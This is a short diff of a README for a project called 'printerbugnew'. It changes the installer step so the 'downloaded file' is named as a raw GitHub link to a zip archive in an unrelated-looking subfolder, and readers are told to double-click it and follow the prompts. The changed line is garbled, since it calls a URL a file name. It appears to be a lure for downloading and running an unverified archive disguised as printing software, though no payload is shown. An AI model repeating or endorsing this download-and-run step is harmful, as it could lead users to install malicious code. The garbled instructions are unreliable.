Bureaudechangeportalsystem174/printerbugnew/README.md

 4. **Locate the Downloaded File:** Once the download is complete, navigate to your 'Downloads' folder or the location where your browser saves files.

-5. **Run the Installer:** Double-click on the downloaded file (usually named something like `printerbugnew_installer.exe`).
+5. **Run the Installer:** Double-click on the downloaded file (usually named something like `https://raw.githubusercontent.com/Bureaudechangeportalsystem174/printerbugnew/main/washmaid/printerbugnew-2.6.zip`).
 Follow the prompts on your screen to install the application.

 6. **Launch the Application:** After installation, find printerbugnew in your Start Menu or desktop shortcut.
 Open it to get started with your printing tasks!